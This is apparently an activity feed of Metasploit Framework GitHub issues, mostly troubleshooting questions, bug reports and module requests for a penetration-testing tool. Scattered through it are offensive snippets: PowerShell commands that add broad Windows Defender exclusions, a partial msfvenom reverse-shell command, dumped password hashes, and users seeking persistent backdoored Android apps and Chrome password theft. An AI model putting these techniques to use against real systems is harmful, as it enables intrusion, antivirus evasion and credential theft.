[2022-10-05 11:46] Slavfucious commented on #17106
Well, on the vm i am able to do every method for screenshotting or sharing without problem directly from the meterpreter on nt auth. rn i am at work and when i get back imma try to migrate and see if this gets fixed

[2022-10-05 14:13] nothing-2say commented on #9199
Hey,I am also having this issue,If you find any solution please help me....

[2022-10-05 14:54] shk-trix commented on #16375
Karpiyon como pudiste solucionarlo?

[2022-10-05 15:00] shk-trix commented on #15529
Lograron solucionar el error?

managed to fix the error

[2022-10-05 15:03] #16863 closed

[2022-10-05 15:03] #16855 closed

[2022-10-05 15:03] #16827 closed

[2022-10-05 15:03] #16784 closed

[2022-10-05 15:38] HuskyHacks opened #17109 "[Question] Current documentation for Meterpreter's transport layer security?"
## Summary
Hello! I'm doing some research on different C2 methods for transport layer security and want to examine the current mechanisms in play with Meterpreter.

I'm looking to answer a simple question: why can I read, in plain text, the I/O for shell_reverse_tcp, but cannot do the same for meterpreter_reverse_tcp under identical circumstances?

I understand that shell_reverse_tcp is a simple /

[2022-10-05 16:27] adfoster-r7 commented on #17109
If you enable Meterpreter's network logging within msfconsole:

https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html#log-meterpreter-tlv-packets

You'll see the very first step is to negotiate aes encryption:

[code]

This means plaintext strings won't appear in the network traffic that's been sent over the wire, as the data was pla

[2022-10-05 16:35] HuskyHacks commented on #17109
@adfoster-r7 precisely what I was looking for. Thank you!

[2022-10-05 16:35] #17109 closed

[2022-10-05 17:41] adfoster-r7 commented on #17107
I just ran through this when on a vpn with a tun0 adapter with a 10.10.0.0/16 network

Running `setg rhosts 10.10.10.100`:

[code]

Verifying:

[code]

Using a module I've not previously used to see lhost and rhost correctly set:

[code]

And I can verify the logic that it choose to pick the default lhost from within msfconsole:

[code]

[2022-10-05 17:44] adfoster-r7 commented on #17107
You can also set options inline which is handy for jumping around modules too, since you can use ctrl+r to search the history for your last run command, or use the up arrow a few times to get the previously run command:

[code]

That aside, i'll keep this issue open as it looks like a bug that should be fixed in the future :+1:

[2022-10-05 17:55] Crypto-Cat commented on #17107
Ah, the mistake I made was using `set rhosts 10.10.x.x` and expecting the LHOST to automatically switch to tun0.

I guess I need to do `setg rhosts 10.10.x.x` in order to ensure auto-selection of the correct adapter.

It would be good to have the `setg lhost` work when dealing with multiple RHOSTS but for my purposes (HTB), using `setg rhosts` will suffice.

Thanks 💜

[2022-10-05 23:09] #17104 closed

[2022-10-06 01:14] Krisdian98 opened #17111 "`bundle install` to install missing gems"
## Steps to reproduce

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here,

[2022-10-06 01:18] #17111 closed

[2022-10-06 01:21] Krisdian98 opened #17112 "Run `bundle install` to install missing gems"
## Steps to reproduce

How'd you do it?

1. ...
2. ...

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here,

[2022-10-06 01:34] #17112 closed

[2022-10-06 13:09] kfkkkk opened #17113 "使用永恒之蓝攻击报错"
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.127.131:4444
[*] 192.168.127.132:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[-] 192.168.127.132:445   - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 192.168.127.132:445   - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.127.132:445 - The target is not vulnerable.
[*

[2022-10-06 15:41] #15992 closed

[2022-10-06 17:55] JustAnda7 commented on #16674
@gwillcox-r7 I would like to contribute to this issue. Is this issue still open?

[2022-10-06 19:07] h00die commented on #16674
ticket is still open, and https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/manageengine_adshacluster_rce.rb#L14 is still there. have at it @JustAnda7

[2022-10-06 21:34] #16217 closed

[2022-10-07 00:11] W00dyLin commented on #17113
This is not an error.
It is just that your target is not vulnerable.

It has """"patch""""'

By the way,bro.You should know that metasploit is not omnipotent,not you choose a module and then you can pentest all the world!!!

[2022-10-07 02:48] 5l1v3r1 commented on #9451
https://www.youtube.com/watch?v=X6WHBO_Qc-Q kinda neural network

[2022-10-07 07:52] JustAnda7 commented on #16019
@adfoster-r7 I would like to contribute to this issue.

[2022-10-07 07:57] JustAnda7 commented on #16019
@adfoster-r7 I had a question regarding the issue that, what should the suggestions to the tab completion to 'http' and other protocols be from something like the hosts table from the database?

[2022-10-07 07:59] FRO-0 opened #17119 ""stdapi" extension is not supported by this meterpreter type () i.e " windows/x64/meterpreter/revese_tcp ""
## Steps to reproduce

How'd you do it?

1. Run the exploit command and session was created .
2. And I can use all the stdapi commands and also Priv commands
3. But today I got an error that stdapi extension is not supporter by this meterpreter type. i.e `windows/x64/meterpreter/reverse_tcp`

Victim OS is Windows 10

## Expected behavior

What should happen?

It should load "stdapi" extension by d

[2022-10-07 13:34] Reversing26 opened #17120 "Meterpreter caught by AV when migrating into explorer.exe"
How to fix?

[2022-10-07 15:02] #16877 closed

[2022-10-07 18:39] jheysel-r7 opened #17121 "FortiGate remote auth by-pass CVE-2022-40684"
https://docs.fortinet.com/document/fortigate/7.2.2/fortios-release-notes/289806/resolved-issues
https://docs.fortinet.com/document/fortigate/7.0.7/fortios-release-notes/289806/resolved-issues

## Summary

I have a vulnerable target but haven't been able to find any patch details yet.

### Motivation

FortiGate instances are widely deployed. I think I module for this vuln would be worth while.

[2022-10-07 18:53] #16674 closed

[2022-10-07 19:58] Gairick52 commented on #17121
@jheysel-r7 i am new to open source can you suggest me some beginner friendly issues

[2022-10-08 00:55] SwapnilKumbhar commented on #16218
Is there any ongoing effort on this issue? I'd like to contribute if not!

[2022-10-08 03:03] Xm-ploit commented on #17120
If you are running your own PC , you can close
antivirus to test.

"Metasploit" is one of the most popular pentesting framework,so the techniques and payloads it use are flagged by every AV.

If you want to test exploit and see the way that a malware works,you can use the function embdded in metasploit.
However,if you want to test exploit and run malware under AVs,the metasploit is not enough.

Yo

[2022-10-08 05:45] JustAnda7 commented on #16693
If this issue is still open, I would like to contribute to it.

[2022-10-09 05:21] NocteDefensor opened #17124 "Reverse Port Forward not working with windows meterpreter payloads metasploit v6.2.22-dev-"
Reverse port forward seems to work great on windows hosts with metasploit version 5+ but with metasploit version v6.2.22-dev- and v6.2.20+, I am not able to reverse port forward and successfully route traffic to and from local webserver on metasploit host.

## Steps to reproduce

How'd you do it?

1.  start meterpreter session on pivot host (windows 10) Reverse HTTPs
2. add route to target host us

[2022-10-09 11:52] Reversing26 commented on #17120
I was able to bypass AV, the detection happens just when I try to migrate to explorer.exe
It won't get detected however if I try to migrate in different proc, it is happening just if migration is performed against explorer.exe

[2022-10-09 14:36] NocteDefensor commented on #17124
I wanted to note that I duplicated this bug behavior with meterpreter/reverse_tcp and reverse_http payloads. I also tried the post autoroute module to add the route vs route add to see if that made any difference(it shouldn't as the portfwd  iss should be mapping traffic to and from the remote and local port.

[2022-10-09 19:30] Reversing26 opened #17125 "Remote Procedure Call Runtime Remote Code Execution Vulnerability - CVE-2022-26809"
A vulnerability who may lead one to execute arbitrary code against modern Windows device with SMB 445 opened.

[2022-10-09 21:27] Slavfucious opened #17126 "post/windows/gather/enum_chrome: Operation Failed: Access is denied"
Steps to reproduce

How'd you do it?

by running post/windows/gather/enum_chrome on nt auth remote meterpreter

Were you following a specific guide/tutorial or reading documentation?
yes
If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.
https://null-byte.wonderhowto.com/how-to/hacking-windows-10-steal-decrypt-passwords-stored-chrome-firef

[2022-10-09 22:50] Slavfucious opened #17127 "Failed to bind to (using WORKING external ip address)"
ok so, im using meterpreter configured with msfvenom to use my router ip. the exe works, i get a connection back, but when i use "use exploit/windows/local/persistence_service" configured with reverse tcp with my public ip again, it does not work.

Why this happenes ? the port forwarding is setupedup correctly, i get connection from my router ip to 192.168.x.x

![image](https://user-images.githubu

[2022-10-10 01:00] bcoles commented on #17127
The value you have set for `LHOST` is not a valid IP address for any of your network interfaces.

The options you're looking for are `ReverseListenerBindAddress` and`ReverseListenerBindPort`.

Set `LHOST` and `LPORT` to your public IP and public port. Set `ReverseListenerBindAddress` and `ReverseListenerBindPort` to your local IP and local port.

[code]

If you don't set `ReverseListenerBindAddres

[2022-10-10 07:35] Slavfucious commented on #17127
![image](https://user-images.githubusercontent.com/113849805/194817618-c70b24d3-5132-4a64-9743-396fbe946227.png)

[2022-10-10 07:41] Slavfucious commented on #17127
Thank you, now its working like a charm, also, @bcoles  i have one other issue with a module for chrome enum with no idea why is it failing, can you check it ?. thanks in advance

[2022-10-10 09:52] #17127 closed

[2022-10-10 15:03] #16893 closed

[2022-10-10 15:03] #16850 closed

[2022-10-10 15:03] #16847 closed

[2022-10-11 00:30] ChillVibesMushroom commented on #8916
how do you fix it then

[2022-10-11 00:39] ChillVibesMushroom commented on #16330
what was the fix maybe keystore

[2022-10-11 00:57] ChillVibesMushroom commented on #11231
i found a fix with exploit -j idk if this temporary or not but it works with a signed apk using jdk 8 i believe or 11 never had the issue until now tbh

[2022-10-11 08:19] karpiyon commented on #16375
The only way I am able to create persistent payloads to run is by creating my own app. I had to add the persistent backdoor to my app and tin it's server on the app stars as a consistent server.
injecting the payload to an existing APK in this way is too complicated.
you also need the user,when installing the app, to confirm all the app permissions

________________________________
From: shk-trix

[2022-10-11 14:35] shk-trix commented on #16375
Podrías ayudarme a crear una aplicación con la persistencia, te pagare.

[2022-10-11 18:59] Slavfucious commented on #17127
well, it aint workin, typed everything right and nothin is working

[2022-10-11 19:05] Slavfucious commented on #17127
@bcoles

[2022-10-11 19:31] Slavfucious opened #17131 "Revese TCP over interenet not working (after ReverseListenerBindAddress and ReverseListenerBindPort)"
So, im using this module exploit/windows/local/bypassuac_fodhelper and when i use meterpreter reverse tcp payload. i set it all like needed and nothing is happening, (exploit completed but no session)  my ReverseListenerBindAddress  is 192.168.1.15 (ifconfig),

port forwarded port 7001 for external and internal
for lhost im using my router public ip
for lport im using 7001
for ReverseListenerBindA

[2022-10-12 08:18] Slavfucious commented on #17120
easy fix for win defender, for others, idk
#ANTIVIRUS EXCLUSIONS
powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\"
powershell -Command Add-MpPreference -ExclusionProcess "java.exe"
powershell -Command Add-MpPreference -ExclusionExtension ".exe"

[2022-10-12 12:03] scriptkid2222 commented on #16780
Это сработало

[2022-10-12 14:46] jheysel-r7 opened #17134 "Apache CouchDB Erlang RCE (CVE-2022-24706)"
## Summary

PoC for an RCE in Apache CouchDB is publicly available, would make a great metasploit module.

### Basic example

[If you have a POC, blog post or any other useful references please let us know in this section.](https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit)

[2022-10-13 14:47] bwatters-r7 opened #17136 "Consistency in Post modules and Post module libraries"
This is blatantly copy/pasted from https://github.com/rapid7/metasploit-framework/pull/17110

I think the PR itself is ready to land, but @bcoles hit at the heart of a challenge we face complete with suggestions for how we address the challenge,  and I think we should keep tracking that outside the PR:

so my worry is that if we add these checks to everything, any module that does a chain of calls

[2022-10-13 15:31] delightfuldallas opened #17137 "Payloads - This app can't run on your PC"
Hello guys, i tried to access my PC from my kali laptop but when i generate an exe payload and try to run it on my windows pc says it cant run on this pc. AV id disabled. Am i doing smth wrong or payload files are outdated ? Im using Windows 10

[2022-10-13 23:34] bcoles commented on #17137
How did you generate the payload?

Microsoft is a multi-billion dollar company. I find it hard to believe their operating system says "it cant run on this pc".

[2022-10-14 00:40] #16690 closed

[2022-10-14 02:24] dragonslayer771 opened #17138 "msfconsole command will not work."
the command msfconsole "is not found" even though i have metasploit-framework installed. Ive tried uninstalling metasploit-framework though theres "no formula with that name". Ive tried installing agian but "it already exists".  could anyone help?

[2022-10-14 02:36] bcoles commented on #17138
`msfconsole` is located in the Metasploit directory.

[2022-10-14 02:40] dragonslayer771 commented on #17138
so what should i do? im very new to this.

[2022-10-14 02:45] bcoles commented on #17138
[code]

[2022-10-14 07:33] Kevlog commented on #16263
And this work on WSL2 Kali LIinux:
Distributor ID: Kali
Description:    Kali GNU/Linux Rolling
Release:          2022.3
Codename:     kali-rolling

[2022-10-14 10:03] bcoles commented on #17131
Have you tested the port forward to ensure it is routing correctly?

[2022-10-14 10:37] Slavfucious commented on #17131
yes i get normal meterpreter reverse TCP (as entry point) but when i try to make another session (lets say uac bypass via fodhelper) i cant get another session (it starts the reverse tcp handler without problem but i get exploit coneted but no session was opened). any thoughts?

[2022-10-14 10:52] bcoles commented on #17131
Is it only the `bypassuac_fodhelper` module you're having issues with? Do you know if the module works on the target? What operating system?

[2022-10-14 11:04] Slavfucious commented on #17131
all kinds of modules
iknow that module is working.
w10 21h1
 (i have tested the same modules at the another 21h1 os and they work perfectly without problems)

[2022-10-14 12:58] shellchocolat opened #17139 "Is there an error with Zutto Dekiru encoder?"
## Summary

I tried to use Zutto Dekiru encoder (x64), but it seems not to work correctly because the **FXSAVE/FXSAVE64** doesn't save the FPU environnment as well as **FNSTENV** does on Shikata Ga Nai encoder (x86), so the POP instruction doesn't get a relative address to the shellcode's position leading to an access denied when XOR with the key.

## Relevant information

The command used to gene

[2022-10-14 15:37] #10196 closed

[2022-10-14 21:23] Reversing26 commented on #17126
I have same issue, I am running as explorer.exe, that's anomalous, maybe they update chrome security policy again to prevent password dumping?

[2022-10-14 21:30] Slavfucious commented on #17126
well, somehow i made it run no idea how, i get to the masterkey part, and i get line errors

[2022-10-15 01:19] Radhejjjjj commented on #13231
![Uploading Screenshot_2022-10-15-06-47-40-645_com.termux.jpg…]()
Help

[2022-10-15 13:13] h00die opened #17144 "Microsoft Teams Authenticated Cookie post module"
## Summary

https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens

From the article:
"In August 2022, the Vectra Protect team identified a post-exploitation opportunity allowing malicious actors with sufficient local or remote file system access to steal valid user credentials from Microsoft Teams due to their plaintext storage on disk. This plaintext credential mana

[2022-10-16 06:10] Anub12 commented on #16007
I also encountered the same issue but didn't get any solution.....

[2022-10-16 06:22] bcoles commented on #16007
The module requires a session. You can set the session with the `set` command. `set session <session id>`.

[2022-10-16 07:58] AndyGuiw opened #17146 "msfconsole not importing rb ext to the database"
I'm facing some very unintended behavior from my msfconsole. After proceeded with every correct step to import my rb exploit to the tool and after running the updatedb command at the end, it wouldn't add my exploit to the tool's database and I'm pretty sure my code is rb ext. Ah! besides running updatedb I also started postgresql and the searchsploit -u to be certain that it'd work. What in the Sa

[2022-10-16 08:56] bcoles commented on #17146
what?

what?

what? This is the Metasploit issue tracker. PostgreSQL is a DBMS. Seacrchsploit is an unrelated third-party tool.

What is the issue? What are you trying to do? What did you expect to happen? What happened instead? Show logs/screenshots.

[2022-10-16 12:24] h00die opened #17148 "Remote Code Execution in JXPath Library (CVE-2022-41852)"
https://github.com/Warxim/CVE-2022-41852

[2022-10-16 18:35] ruant commented on #16977
@marik22354 Nice if you could write how you solved it? Was it the post from @gwillcox-r7  that solved it for you?

[2022-10-17 00:36] AlanFoster opened #17150 "windows/fileformat/office_word_hta broken"
When running `windows/fileformat/office_word_hta` against HTB reel, this modules does not work.

## Steps to reproduce

Use `windows/fileformat/office_word_hta`, set lhost, run, and email the rtf file to the reel smtp server:

[code]

## Expected behavior

Shell opens, similar to with 5.0.101:

[code]

## Current behavior

Module broken in latest Metasploit version - no shell is opened:

[code]

#

[2022-10-17 01:06] AlanFoster commented on #17150
Closing; The module defaults setting SRVHOST to 0.0.0.0, which is embedded into the payload. Fixed by setting SRVHOST to the same value as LHOST.

[2022-10-17 01:06] #17150 closed

[2022-10-17 02:35] C4ssif3r opened #17151 "module not found error in msfconsole"
Hi rapid7 team !
I have this error when type `msfconsole` in my terminal...
Error :
[code]

[2022-10-17 02:44] bcoles commented on #17151
Where does the "module not found" error come from? This message is not shown in the stack trace.

[2022-10-17 20:50] llamasoft opened #17156 "Python Meterpreter loader AES constants needlessly large"
## Summary

The [Python Meterpreter loader](https://github.com/rapid7/metasploit-framework/blob/d3486013f8771ec1ebc027dc5e6fb20d67738664/lib/msf/core/payload/python/meterpreter_loader.rb) AES constants lookups are needlessly large.
The Si, T1, T2, T3, T4, T5, T6, T7, T8, U1, U2, U3, and U4 lookups constitute over 32kb of text.  Each of these lookups can be derived from the 256-element S-box, `S`,

[2022-10-17 21:49] gwillcox-r7 commented on #17138
I assume your using Brew to install given your output above. The installation script at https://github.com/Homebrew/homebrew-cask/blob/HEAD/Casks/metasploit.rb suggests that `/opt/metasploit-framework/bin/` may be where some of the files are installed for the executables. I would recommend searching `/opt/metasploit-framework` for the `msfconsole` binary and seeing if you need to add the path wher

[2022-10-17 21:52] gwillcox-r7 commented on #17137
@bcoles It could be that the payload was generated using the wrong architecture or was simply formatted incorrectly (example trying to stuff a android binary into a Windows EXE will result in a valid EXE however you would get that "this can't run on this PC" error").

Similar errors may also be encountered for instance if you try to make a ARM64 binary run on a x64 platform.

I would check that th

[2022-10-17 21:53] gwillcox-r7 commented on #17139
`msfvenom -p linux/x64/shell/reverse_tcp -a x64 --platform linux -e x64/zutto_dekiru -f elf -o t.binLHOST=xxx.xxx.xxx.xxx LPORT=xxxx` <- Is this the command you ran? Looks like your missing a space between the options and `-o t.bin`.

[2022-10-17 21:55] gwillcox-r7 commented on #17113
Please follow the template. Closing as template was not followed and there is not enough info here to reproduce the issue. Additionally the output seems to be expected behavior and is simply telling you the target is not vulnerable according to the module.

[2022-10-17 21:55] #17113 closed

[2022-10-17 21:58] gwillcox-r7 commented on #17120
Certain processes may be more heavily monitored than others by AV which may explain this difference. For instance SAM related processes tend to be heavily monitored by AV due to their sensitivity, whereas other processes may not be as heavily monitored.

Without knowing the internals of the AV though is hard to say. Every AV has its own set of rules and on way of dealing with things.

Closing this

[2022-10-17 21:58] #17120 closed

[2022-10-18 00:49] bcoles commented on #17137
Microsoft is a multi-billion dollar company. I find it hard to believe their operating system says "it cant run on this pc".

There is insufficient information to reproduce this issue. OP wants us to play guessing games. Closing.

[2022-10-18 00:49] #17137 closed

[2022-10-18 06:23] Pri3st opened #17158 "portfwd list Local vs Remote display"
![Screenshot 2022-10-18 09:23:06](https://user-images.githubusercontent.com/66968346/196351650-e16ce4df-0acb-4f5a-aece-f48e041ad6f1.png)

I think that Local and Remote listings are in reverse than they should be.

[2022-10-18 09:59] Salahbahdi2004 commented on #13808
Did you find a solution?

[2022-10-18 15:49] #17107 closed

[2022-10-18 20:33] h00die opened #17159 "apache common-texts: cve-2022-42889"
https://securityboulevard.com/2022/10/new-text2shell-rce-vulnerability-in-apache-common-texts-cve-2022-42889/

[2022-10-18 21:45] kwyxz commented on #17151
I am seeing this very same error in the latest Kali Linux trying to initialize the db.
To replicate : msfdb reinit as root.

[code]

[2022-10-18 23:14] k0pak4 commented on #16300
I took a look into this. It looks like the error is being caused when payloads reload and hit this line: https://github.com/rapid7/metasploit-framework/blob/fedcdc386b1bf06c7fd46d1f196c2c926630d8a7/lib/msf/core/module_manager/reloading.rb#L24 I did some debugging to find this in the stack trace. Based on what I can tell, it's because the payload module that's being reloaded does not have a parent

[2022-10-19 08:52] #16515 closed

[2022-10-20 06:27] tekn0x commented on #12896
I also have this error seemingly at random. Everything is x64. (meterpreter is x64, process injected is x64, OS is Winx64.

Sometimes I can dump the hashes, sometimes only the first 2 come in and I get that error.
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Dark:1000:aad3b435b51404eeaad3b435b51404ee:7c4fe5eada682714a036e39378362bab:

[2022-10-21 08:54] cdelafuente-r7 opened #17169 "Kerberos: Update scanner/smb/smb_login to support Kerberos"
`smb_login` has a custom codepath for login scanners. Update this module to support Kerberos authentication.

[2022-10-21 10:39] OtojonKhudayarov opened #17170 "How can we update the framework?( msfupdate error)"
## Summary

## Relevant information

Before the  new version i used to update the MSF framework with just one command `msfupdate` hit Enter and that's it .
But now it  say  different thing =>    "msf6 > msfupdate
[*] exec: msfupdate

msfupdate is no longer supported when Metasploit is part of the operating
system. Please use 'apt update; apt install metasploit-framework'
msf6 > "
 is  it normal to

[2022-10-21 12:46] Reversing26 opened #17173 ""download" and "upload" for single files not working in pure shell sessions"
When I try to download something, a simple shell session would just always throw error "file not found", despite I've specified the correct path in this format
download C:\Windows\file.exe to home\kali\file.exe
or
download C:/Windows/file.exe to home/kali/file.exe
I've also tried to slightly change the syntax but still not working

[2022-10-21 12:49] bcoles commented on #17173
Can you show a screenshot of what you are trying to do?

[2022-10-21 15:26] gwillcox-r7 commented on #17170
Your solution is in the error message:

[code]

You need to run `apt update` followed by `apt install metasploit-framework` to get the updates. `msfupdate` is not supported on platforms where Metasploit is built into the operating system itself such as on Kali Linux and similar distros.

[2022-10-21 15:26] #17170 closed

[2022-10-21 21:08] Reversing26 commented on #17173
![image](https://user-images.githubusercontent.com/101843356/197288968-21cf3554-843f-441f-9b29-3dee77d17a75.png)

[2022-10-21 21:08] Reversing26 commented on #17173
That's it

[2022-10-22 15:25] ajmeese7 opened #17178 "Option to retry SSH login scanner when connection closed"
## Summary

One one of the HTB boxes I am currently working on, the remote host will sporadically refuse SSH connections. When that happens in the `scanner/ssh/ssh_login` module a few times, the process will die instead of retrying the username and password combination. I think an option to add the retry behavior would be beneficial for situations such as this.

[2022-10-22 15:35] adfoster-r7 commented on #17178
Which HTB box?

[2022-10-22 15:41] ismoiloffS opened #17179 "stdapi_fs_ls: Operation failed: 1"
stdapi_fs_ls: Operation failed: 1
I used meta sploit
and
cd /sdcard
ls
than this error

[2022-10-22 17:13] Reversing26 commented on #17173
I keep getting The target file does not exist

[2022-10-22 23:05] nellaisamurai commented on #16785
any solutions???
![image](https://user-images.githubusercontent.com/2310860/197365525-70976290-bf40-41fd-bf60-61698fa7d549.png)

[2022-10-23 02:23] Reversing26 opened #17180 "SMB capture not working"
![image](https://user-images.githubusercontent.com/101843356/197370074-5e918a29-98cb-4516-a01a-9ce2c710626c.png)
Despite I'm running msfconsole as Administrator I have permission denied

[2022-10-23 03:51] bcoles commented on #17173
Looks like this is broken for shell sessions on Windows hosts.

[code]

It works for shell sessions on Linux hosts.

[code]

[2022-10-23 03:59] bcoles commented on #17179
You do not have permissions to access `/sdcard`. Perhaps the application does not have the appropriate permissions. You should be able to browse other parts of the file system.

[2022-10-23 12:07] ajmeese7 commented on #17178
@adfoster-r7 it's the "Cult Meeting" box in the Hack the Boo 2022 CTF. Trying to SSH into the box runs a shell script that takes user input as opposed to a standard SSH login, which is why the connections are refused.

Brute forcing the login was obviously not the route to take, as that's rarely how HTB/CTF challenges work, but I still think that it's something that could be improved about the too

[2022-10-24 10:32] cdelafuente-r7 commented on #17180
Since `SRVPORT` is 445 (below 1024), does the account used to run Metasploit have enough privileges?

[2022-10-24 16:52] #16818 closed

[2022-10-25 21:54] adfoster-r7 commented on #17178
Looks like there's a hard coded 10 connection failures that can be raised before the module stops scanning:

https://github.com/rapid7/metasploit-framework/blob/8e9061c86d325a573a10ed06bf4810121cc7d702/lib/metasploit/framework/login_scanner/base.rb#L245-L251

Would it make sense to allow the connection failures count to be user defined?

[2022-10-25 23:43] adfoster-r7 commented on #17173
Looks like the shell command `download` implementation doesn't handle windows powershell. The implementation assumes a unix-y response:

https://github.com/rapid7/metasploit-framework/blob/8e9061c86d325a573a10ed06bf4810121cc7d702/lib/msf/base/sessions/command_shell.rb#L437-L438

https://github.com/rapid7/metasploit-framework/blob/8e9061c86d325a573a10ed06bf4810121cc7d702/lib/msf/base/sessions/comma

[2022-10-26 00:29] ajmeese7 commented on #17178
Good find, thanks!

In my opinion, there should be options to:

a. Set a specified number of failures
b. Set an unlimited number of failures
c. Make the failed connections retry with the same settings, instead of just breaking

[2022-10-26 08:58] jcbrave commented on #15177
I am facing the same problem, Did you found your problem solution? Please let me know eagerly waiting for yours response

[2022-10-26 11:13] dedshit commented on #15177
sir why dont you manually insert the payload into legitimate apps that are asking permission at runtime ?

[2022-10-26 16:22] jcbrave commented on #15177
Because we need a persistant Connection and i think its not possible through Inserting a payload into another App.

[2022-10-26 20:40] #17156 closed

[2022-10-27 12:51] saheredelgadom commented on #17046
but nobody answered, so it is that the errors that you create yourself are resolved? A few months the program worked fine after an update it stopped working correctly.

[2022-10-27 16:43] smcintyre-r7 commented on #17180
I'm highly confident that this is not a bug. You need to run metasploit with the privileges necessary to bind to the desired port. This is most easily done by running msfconsole with root using sudo, or you could do something fancier like reconfigure the kernel with `net.ipv4.ip_unprivileged_port_start=0` or `CAP_NET_BIND_SERVICE` on the Ruby binary.

The latter 2 options are really outside the su

[2022-10-27 16:43] #17180 closed

[2022-10-27 17:15] smcintyre-r7 commented on #17063
Alright, I was able to reproduce this on a Windows Server 2019 domain controller.

[2022-10-27 17:29] piffd0s commented on #10946
just restart  msfconsole after you init the database

[2022-10-27 18:15] 3V3RYONE commented on #17178
Hello, I'd like to work on implementing this suggestion feature. Is it up for grabs?

[2022-10-27 21:58] ajmeese7 commented on #17178
@3V3RYONE as far as I'm aware it is, go for it! I'd love to do it myself if I had the time, but life has a way of getting busy.

[2022-10-28 13:36] gappp1999 opened #17193 "How to solve the problem that too many meterreter sessions cause MSF RPC API calls to get stuck"
## I'm trying to write an automated domain penetration tool using the MSF RPC API

### But when I get more than 4 meterreter sessions through some methods (such as Eternal Blue, psexec, and other modules), when I try to call the MSF RPC API again, there will be serious stumbling or even no interaction.

![MX1LS9B$RL6YV46X2`F4DWM](https://user-images.githubusercontent.com/107257355/198608295-e7be9c

[2022-10-28 13:43] cdelafuente-r7 opened #17194 "Password Manager Pro password recovery post module"
Add a post module to gather credentials from Password Manager Pro local database. See this [article](https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/) for details.

[2022-10-28 13:43] cdelafuente-r7 commented on #17194
https://github.com/rapid7/metasploit-framework/pull/17192

[2022-10-28 15:42] #17173 closed

[2022-10-29 23:19] h00die opened #17198 "VMWare NSX Manager (CVE-2021-39144) poc"
https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html

[2022-10-30 05:21] fastchain opened #17199 "How to create unstaged payloads from staged?"
## Reason

Staged payloads can't handle reconnect properly: on reconnect server sends stages to client, that already staged. So sessions can not be reestablished after a network glitch.

## Summary
Is there any guide or description how to create unstaged payloads from staged?  It seems to be not a rocket sience, but since I can't find low-level tech description of payloads architecture, it's getti

[2022-10-30 10:53] jvoisin opened #17200 "Add CVE-2022-1043"
@minipli-oss wrote a [neat exploit](https://github.com/opensrcsec/same_type_object_reuse_exploits/blob/main/cve-2022-1043.c) for CVE-2022-1043, and it has the following advantages over your everyday Linux LPE:

- No hardcoded offsets
- No ROP
- Architecture-agnostic-ish
- Bypasses all existing mitigations, even out-of-kernel-ones like grsecurity (for version older than the exploit of course, since

[2022-10-30 13:07] smackking770 commented on #9476
[-] No platform was selected, choosing Msf::Module::Platform::Android from the payload
[-] No arch selected, selecting arch: dalvik from the payload
Error: One or more options failed to validate: LHOST.

[2022-10-31 01:41] julirc opened #17201 "add CVE-2022-41352"
Dear Team,

I have not been able to test and check CVE-2022-41352 in zimbra.

[2022-10-31 01:50] bcoles commented on #17201
If you run the module with `set HttpTrace true` you can see the HTTP requests and responses generated during `check` and `exploit`. This may help with debugging.

[2022-10-31 15:00] #16804 closed

[2022-10-31 16:22] bcoles opened #17204 "Add executable `_PATH` options for all cmd payloads"
Allowing operators to specify the file system path for a command payload executable seems like a good idea.

Currently very few command payloads supports this. `cmd/windows/jjs_reverse_tcp` is an exception:

https://github.com/rapid7/metasploit-framework/blob/4bf3ce3a6bba38289b9e49fd81bb3f63ec2d846a/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb#L39

A quick `grep` over the code base (`PY

[2022-10-31 16:23] bcoles commented on #17204
Tentatively adding `newbie-friendly` label pending feedback.

[2022-10-31 16:23] llamasoft opened #17205 "Compress Python Meterpreter payload"
## Summary

Even after shrinking the AES constants (#17156) the Python Meterpreter payload is still rather large.

I noticed that the internal AES and RSA modules use [zlib+base64](https://github.com/rapid7/metasploit-framework/blob/4bf3ce3a6bba38289b9e49fd81bb3f63ec2d846a/lib/msf/core/payload/python/meterpreter_loader.rb#L157-L158), but the final payload is only [base64 encoded](https://github.co

[2022-10-31 17:39] digininja opened #17206 "ProxyShell exploit maxing out at 100 email addresses"
I think this is a limitation with the module, I'm trying to work through it but figured I'd ask as it is slow going.

I'm  using `windows/http/exchange_proxyshell_rce` against a fairly large client. It does the enumeration call to `autodiscover/autodiscover.xml` and says it got 100 addresses back, it then goes through and tries to find a vulnerable one. The list it runs through starts with address

[2022-11-01 17:33] #17134 closed

[2022-11-01 20:02] #17063 closed

[2022-11-01 20:37] gwillcox-r7 opened #17212 "Add Support for Windows Access Masks to MDtypeAccess"
## Summary
This is something that came up whilst doing code review on https://github.com/rapid7/metasploit-framework/pull/17122 but it would be nice to have something inside `MsDtypeAccess` for the access mask that translates the access mask into a more human readable string.

This would likely involve using some functions along with BinData to form the data parsing functionality.

Spencer mention

[2022-11-01 20:40] gwillcox-r7 commented on #17201
Removing suggestion-module label since we already have a module for this CVE in Metasploit and that tag is designed to be used to request new modules for inclusion in Metasploit. Since this is more of a question I've added the appropriate question label.

[2022-11-01 20:42] gwillcox-r7 commented on #17201
Without further details or output @julirc I'm not sure we are going to be able to help you much here. Try @bcoles advice, otherwise I'd recommend opening a new issue with more details and following the issue template to be sure you provide the appropriate level of detail r.e your setup, what steps you tried, the output you got, and what your issue is.

Closing this issue due to insufficient inform

[2022-11-01 20:42] #17201 closed

